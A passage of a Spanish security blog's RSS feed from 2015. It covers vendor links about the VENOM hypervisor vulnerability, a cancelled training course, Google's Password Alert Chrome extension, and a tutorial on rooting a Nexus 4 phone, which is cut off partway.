href=&quot;https://www.fireeye.com/content/dam/fireeye-www/support/pdfs/fireeye-venom-vulnerability.pdf&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;https://www.fireeye.com/content/dam/fireeye-www/support/pdfs/fireeye-venom-vulnerability.pdf&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Linode:&amp;nbsp;&lt;a href=&quot;https://blog.linode.com/2015/05/13/venom-cve-2015-3456-vulnerability-and-linode/&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;https://blog.linode.com/2015/05/13/venom-cve-2015-3456-vulnerability-and-linode/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Rackspace:&amp;nbsp;&lt;a href=&quot;https://community.rackspace.com/general/f/53/t/5187&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;https://community.rackspace.com/general/f/53/t/5187&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Ubuntu:&amp;nbsp;&lt;a href=&quot;http://www.ubuntu.com/usn/usn-2608-1/&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;http://www.ubuntu.com/usn/usn-2608-1/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Debian:&amp;nbsp;&lt;a href=&quot;https://security-tracker.debian.org/tracker/CVE-2015-3456&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;https://security-tracker.debian.org/tracker/CVE-2015-3456&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;Suse:&amp;nbsp;&lt;a href=&quot;https://www.suse.com/support/kb/doc.php?id=7016497&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;https://www.suse.com/support/kb/doc.php?id=7016497&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;DigitalOcean:&amp;nbsp;&lt;a href=&quot;https://www.digitalocean.com/company/blog/update-on-CVE-2015-3456/&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;https://www.digitalocean.com/company/blog/update-on-CVE-2015-3456/&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;li style=&quot;border: 0px; box-sizing: border-box; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;f5:&amp;nbsp;&lt;a href=&quot;https://support.f5.com/kb/en-us/solutions/public/16000/600/sol16620.html&quot; style=&quot;-webkit-transition: all 0.3s ease; border: 0px; box-sizing: border-box; cursor: pointer; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: none 0px; padding: 0px; text-decoration: none; transition: all 0.3s ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;https://support.f5.com/kb/en-us/solutions/public/16000/600/sol16620.html&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div style=&quot;background-color: rgba(0, 0, 0, 0.0392157); border: 0px; box-sizing: border-box; color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px; margin-bottom: 20px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;We recommend you reach out to your vendors directly to get the latest security updates.&lt;/div&gt;&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;¿Qué pasa con QubesOS?&lt;/span&gt;&lt;/b&gt;&lt;div&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Hasta que no salga la versión 3.0 ésta se encuentra desarrollada sobre un hypervisor XEN, por lo que consulta la &lt;a href=&quot;https://www.qubes-os.org/community/&quot; target=&quot;_blank&quot;&gt;página oficial&lt;/a&gt; para conocer si esta disponible el parche.&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;Referencia:&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 14px; line-height: 18px;&quot;&gt;http://venom.crowdstrike.com/ |&amp;nbsp;http://xenbits.xen.org/xsa/advisory-133.html&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif;&quot;&gt;&lt;span style=&quot;font-size: 14px; line-height: 18px;&quot;&gt;#ST2Labs - www.st2labs.com&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;background-color: rgba(0, 0, 0, 0.0392157); color: #494949; font-family: karlaregular, Helvetica, Arial, sans-serif; font-size: 14px; line-height: 18px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/05/venom-vulnerability-all-vm-are-in-risk.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-6I6bZXMhIew/VVTJmVCRS5I/AAAAAAAAddA/L_TGwgJJBOw/s72-c/ST2_VENOM_Head.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-250940320136967794</guid><pubDate>Wed, 13 May 2015 15:37:00 +0000</pubDate><atom:updated>2015-06-26T08:37:25.541+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">CanalSeguro</category><category domain="http://www.blogger.com/atom/ns#">Curso</category><category domain="http://www.blogger.com/atom/ns#">Formación</category><category domain="http://www.blogger.com/atom/ns#">Network</category><category domain="http://www.blogger.com/atom/ns#">Redes</category><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">ST2</category><category domain="http://www.blogger.com/atom/ns#">ST2Blog</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">System</category><title>Curso: SSN-ST2-01 - Security System and Network</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-dvdHOveyt74/VVNpND08aeI/AAAAAAAAdcs/ej9dSBSj0MU/s1600/SSN-ST2-01.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;213&quot; src=&quot;http://4.bp.blogspot.com/-dvdHOveyt74/VVNpND08aeI/AAAAAAAAdcs/ej9dSBSj0MU/s640/SSN-ST2-01.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;ACTUALIZACIÓN (26/06/2015)&lt;/b&gt;:&lt;/span&gt; El curso ha sido cancelado por &quot;agotamiento&quot; de convocatoria. Hasta nuevo aviso, &lt;u&gt;&lt;b&gt;no&amp;nbsp;habrá&amp;nbsp;más cursos en colaboración&lt;/b&gt;&lt;/u&gt;&amp;nbsp;ST2Labs y Canal Seguro. &lt;i&gt;&lt;span style=&quot;color: #990000;&quot;&gt;Aviso: &lt;b&gt;no soy tutor de ningún otro curso en Canal Seguro&lt;/b&gt;, a menos que yo mismo lo anuncie de forma oficial a través de mis cuentas de redes sociales y este Blog_.&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&amp;gt;&amp;gt;&amp;gt; /*&lt;/div&gt;&lt;i&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;div style=&quot;background-color: white; color: #333333; font-family: Roboto; margin-bottom: 0.0001pt; text-align: justify;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;[..] lanza el curso de &quot;Security Systems and Networks” con el firme objetivo de proporcionar al alumno las herramientas y conocimientos necesarios para realizar un análisis básico de seguridad de sistemas y redes, desde un perfil ético para poder detectar las vulnerabilidad y proponer contramedidas para reducir el nivel del riesgo.&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;i&gt;[...]&lt;/i&gt;&lt;/span&gt;&lt;span style=&quot;font-size: 14px; line-height: 20px;&quot;&gt; */&lt;/span&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/05/curso-ssn-st2-01-security-system-and.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-dvdHOveyt74/VVNpND08aeI/AAAAAAAAdcs/ej9dSBSj0MU/s72-c/SSN-ST2-01.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-589393991739346616</guid><pubDate>Fri, 01 May 2015 11:06:00 +0000</pubDate><atom:updated>2015-05-06T09:15:56.836+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Alerta</category><category domain="http://www.blogger.com/atom/ns#">Attack</category><category domain="http://www.blogger.com/atom/ns#">Chrome</category><category domain="http://www.blogger.com/atom/ns#">Google</category><category domain="http://www.blogger.com/atom/ns#">Navegador</category><category domain="http://www.blogger.com/atom/ns#">Password</category><category domain="http://www.blogger.com/atom/ns#">Phishing</category><category domain="http://www.blogger.com/atom/ns#">Protección</category><category domain="http://www.blogger.com/atom/ns#">Protected</category><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><title>Password Alert: Plugin para Google Chrome - Protege tus cuentas de Google</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-fTd1gb9OMTU/VUNd7AT2VlI/AAAAAAAAdcU/uCcyS1sWGow/s1600/ST2_google_Chrome.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-fTd1gb9OMTU/VUNd7AT2VlI/AAAAAAAAdcU/uCcyS1sWGow/s1600/ST2_google_Chrome.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Si eres de los que utiliza Google Chrome como navegador por defecto a diario en casa y el trabajo, te recomiendo que sigas leyendo.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;-- Google Chrome Plugins - Password Alert&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Google presenta una extensión para Google Chrome que te ayudará a protegerte frente a ataques de phishing que intentan conseguir tu contraseña de acceso a las cuentas de Google.&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;i&gt;Alerta de protección de contraseña te ayuda a protegerte contra ataques de phishing&lt;br /&gt;by Google.&lt;/i&gt;&lt;/blockquote&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;i&gt;Alerta de protección de contraseña también intenta detectar páginas de inicio de sesión de Google falsas antes de que introduzcas tu contraseña. Para ello, &lt;b&gt;&lt;span style=&quot;color: purple;&quot;&gt;Alerta de protección de contraseña comprueba el código HTML de cada página que visitas para verificar si se trata de una página de inicio de sesión de Google auténtica&lt;/span&gt;&lt;/b&gt;. &lt;/i&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-yqLhH14FNm0/VUNXMjU8hGI/AAAAAAAAdcE/DHIXIfDtiQk/s1600/Google_Password_Protected.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-yqLhH14FNm0/VUNXMjU8hGI/AAAAAAAAdcE/DHIXIfDtiQk/s1600/Google_Password_Protected.png&quot; height=&quot;390&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;¿Qué protege?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;i&gt;Alerta de protección de contraseña &lt;b&gt;no protege las ventanas de incógnito&lt;/b&gt;, las aplicaciones de Chrome ni las extensiones de Chrome. &lt;b&gt;Tampoco protege contraseñas de servicios que no son de Google&lt;/b&gt;. Alerta de protección de contraseña solo funciona en el navegador Chrome si JavaScript está activado.&lt;/i&gt;&lt;/div&gt;&lt;/blockquote&gt;Protege las contraseñas de los servicios de Google frente a ataques que pretender robar y suplantar nuestra identidad digital.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Privacidad&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;¿Alerta de protección de contraseña guarda mi contraseña o mis pulsaciones de teclas?&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;i&gt;&lt;b&gt;No,&lt;/b&gt; Alerta de protección de contraseña no almacena ni tu contraseña ni tus pulsaciones de teclas. En su lugar, guarda una miniatura segura de tu contraseña y luego la compara con la miniatura de tus pulsaciones de teclas más recientes en Chrome.&lt;/i&gt;&lt;/blockquote&gt;&lt;br /&gt;¿Adónde envía datos Alerta de protección de contraseña?&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote class=&quot;tr_bq&quot; style=&quot;text-align: justify;&quot;&gt;&lt;i&gt;Si usas Alerta de protección de contraseña en una cuenta de Gmail, &lt;b&gt;no se enviará ningún dato de tu ordenador&lt;/b&gt;. Si un administrador de &lt;b&gt;Google for Work&lt;/b&gt; elige implementar Alerta de protección de contraseña en tu dominio, &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;el administrador recibirá alertas cuando se active&lt;/span&gt;&lt;/b&gt; Alerta de protección de contraseña&lt;/i&gt;&lt;/blockquote&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Download&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Descarga e instala la Extensión para Google Chrome:&lt;br /&gt;&lt;br /&gt;https://chrome.google.com/webstore/detail/password-alert/noondiphcddnnabmjcihcjfbhfklnnep&lt;br /&gt;&lt;br /&gt;#ST2Labs&lt;br /&gt;@rhodius | @seguridadparatodos | @st2labs&lt;/div&gt;&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/05/password-alert-plugin-para-google.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-fTd1gb9OMTU/VUNd7AT2VlI/AAAAAAAAdcU/uCcyS1sWGow/s72-c/ST2_google_Chrome.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-6970438444284005231</guid><pubDate>Sun, 12 Apr 2015 09:13:00 +0000</pubDate><atom:updated>2015-04-12T11:50:45.282+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Custom</category><category domain="http://www.blogger.com/atom/ns#">cyanogen</category><category domain="http://www.blogger.com/atom/ns#">Google</category><category domain="http://www.blogger.com/atom/ns#">LG</category><category domain="http://www.blogger.com/atom/ns#">lolipop</category><category domain="http://www.blogger.com/atom/ns#">Mobile</category><category domain="http://www.blogger.com/atom/ns#">Nexus</category><category domain="http://www.blogger.com/atom/ns#">ROM</category><category domain="http://www.blogger.com/atom/ns#">Root</category><category domain="http://www.blogger.com/atom/ns#">Rooting</category><category domain="http://www.blogger.com/atom/ns#">Security</category><title>Rooting my Nexus 4 with Android 5.0.1</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-wRj2G3_pVe8/VSo24iGWGWI/AAAAAAAAdag/UBkvFbnpuOc/s1600/ST2_Rooting_head.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-wRj2G3_pVe8/VSo24iGWGWI/AAAAAAAAdag/UBkvFbnpuOc/s1600/ST2_Rooting_head.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Es inusual escribir en inglés, pero en esta ocasión he preferido hacerlo así para ampliar el público objetivo :&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;a href=&quot;http://www.kingoapp.com/image/android-5.0-settings-developer-options.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://www.kingoapp.com/image/android-5.0-settings-developer-options.jpg&quot; height=&quot;320&quot; width=&quot;177&quot; /&gt;&lt;/a&gt;&lt;br /&gt;First of all,&lt;b&gt; &lt;span style=&quot;font-size: large;&quot;&gt;What do you need to start?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;1 .&lt;b&gt; Have &lt;a href=&quot;http://developer.android.com/sdk/win-usb.html&quot; target=&quot;_blank&quot;&gt;USB Driver&lt;/a&gt; installed &lt;/b&gt;in your system [ I supposed you have Windows]&lt;/blockquote&gt;2 .&amp;nbsp;&lt;b&gt;&lt;a href=&quot;http://www.kingoapp.com/root-tutorials/how-to-enable-usb-debugging-mode-on-android-5-lollipop.htm&quot; target=&quot;_blank&quot;&gt;Enable&lt;/a&gt; USB Debbugin Options &lt;/b&gt;( press 7 times in build info into Settings Menu )&lt;br /&gt;&lt;br /&gt;3 . &lt;b&gt;Need have Bootloader unlocked&lt;/b&gt;, if you don&#39;t, please check out this link.&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Now you are ready to reborn your old Nexus Smartphone, get rooting o install custom recovery tool.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;I would like to get rooting into my Nexus 4, because some security tool need have to access root to works well. And time ago I wrote this post about it &quot;root or not?&quot; (&lt;a href=&quot;http://www.seguridadparatodos.es/2013/08/seguridad-moviles-root-or-not.html&quot; target=&quot;_blank&quot;&gt;check out&amp;nbsp;this link&lt;/a&gt; - in spanish only).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;[ Get Root ]&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Before start, is interesting what you make a backup to be protected if something go wrong!&lt;br /&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;1.&amp;nbsp;Need have battery more than 70%&lt;br /&gt;2. Download &lt;a href=&quot;http://www.wugfresh.com/nrt/&quot;&gt;Wug’s Nexus Root Toolkit v2.0.&lt;/a&gt;5.&lt;/blockquote&gt;If you meet with requirements, you can start now:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;Steps:&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-7OlsMurPcy4/VSjvG8znPiI/AAAAAAAAdZc/sVdSi5obomY/s1600/N4_tookkit_3.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-7OlsMurPcy4/VSjvG8znPiI/AAAAAAAAdZc/sVdSi5obomY/s1600/N4_tookkit_3.png&quot; height=&quot;320&quot; width=&quot;247&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;1. Restart your smartphone into Bootloader, you can do this keep hold VOL Down&amp;nbsp;+ Power button during start the phone.&lt;/blockquote&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;2. Run Nexus Root Toolkit, select your model type (in my case Choose OCCAM-MAKO Android 5.0.1 - Build LRX22C)&lt;/blockquote&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;3. Plug the usb of smartphone into your windows system&amp;nbsp;&lt;/blockquote&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;4. Press Root Button with Donwload custom loader and recovery.&lt;/blockquote&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;5. Wait to software detect your device&amp;nbsp;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-j_Rdsw_vgDM/VSosMMs9ORI/AAAAAAAAdZ4/z248kMMkWgQ/s1600/N4_tookkit_5.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-j_Rdsw_vgDM/VSosMMs9ORI/AAAAAAAAdZ4/z248kMMkWgQ/s1600/N4_tookkit_5.png&quot; height=&quot;360&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;If all goes well, Nexus Root Toolkit will do all for you, fisrt of all install a boot with root files, then restart your smartphone to insert a root file system and install a custom recovery too. All is automatic, when all finish you must have your phone rooted.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-Fts2Wyw2CcA/VSos2HaevwI/AAAAAAAAdaE/HgzfWQGgqvk/s1600/N4_tookkit_6.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-Fts2Wyw2CcA/VSos2HaevwI/AAAAAAAAdaE/HgzfWQGgqvk/s1600/N4_tookkit_6.png&quot; height=&quot;320&quot; width=&quot;281&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Now, I want to reborn my Nexus 4 and I have First of All WIPE all data and formating the smartphone, erase all data include operating system. Then smartphone can&#39;t start before I install a nwe operating system. !! Becareful if you formating all data even system ¡¡&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;[ Restore Nexus 4 ]&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;You can used Nexus Root Toolkit for restore you Nexus, you have to install a official Google ROM, the process is:&lt;/div&gt;&lt;br /&gt;&lt;b&gt;&lt;u&gt;Steps to Restore phone:&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;table class=&quot;table table-bordered table-striped&quot; style=&quot;background-color: white; border-bottom-color: rgb(221, 221, 221); border-bottom-style: solid; border-radius: 4px; border-right-color: rgb(221, 221, 221); border-right-style: solid; border-spacing: 0px; border-top-color: rgb(221, 221, 221); border-top-style: solid; border-width: 1px 1px 1px 0px; color: #333333; font-family: &#39;Helvetica Neue&#39;, Helvetica, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 18px; max-width: 100%; width: 650px;&quot;&gt;&lt;tbody&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;b&gt;1. Restart smartphone with Bootloader,&lt;/b&gt;&lt;br /&gt;You must Press Hold VOL down&amp;nbsp;+ Power button to obtain access.&amp;nbsp;&lt;/blockquote&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;2. Run Nexus Root 